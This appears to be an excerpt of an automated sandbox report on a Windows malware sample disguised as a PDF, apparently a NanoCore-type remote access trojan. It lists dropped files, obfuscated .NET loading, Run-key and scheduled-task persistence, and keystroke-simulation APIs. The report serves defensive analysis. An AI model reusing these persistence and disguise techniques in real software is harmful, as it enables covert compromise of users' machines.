      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile created: C:\Users\user\AppData\Local\temp\Folder8_410Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxname
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: sfxstime
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCommand line argument: STARTDLG
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeFile written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.iniJump to behavior
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: 026910003102350.pdf.scr.exeStatic file information: File size 1064658 > 1048576
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: 026910003102350.pdf.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 026910003102350.pdf.scr.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF640 push ecx; ret
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDEB78 push eax; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00360332 push edi; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00330E06 push ecx; ret
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032DBFA push cs; iretd
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032DC00 push eax; iretd
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: 026910003102350.pdf.scr.exe Static PE information: section name: .didat
      Source: itugx.exe.0.dr Static PE information: real checksum: 0xe50ad should be: 0xe9063
      Source: 026910003102350.pdf.scr.exe Static PE information: real checksum: 0x0 should be: 0x1079dd
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe (dropped file)
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe (dropped file)
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe (dropped file)

      Boot Survival

      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
      Source: Possible double extension: pdf.scr Static PE information: 026910003102350.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
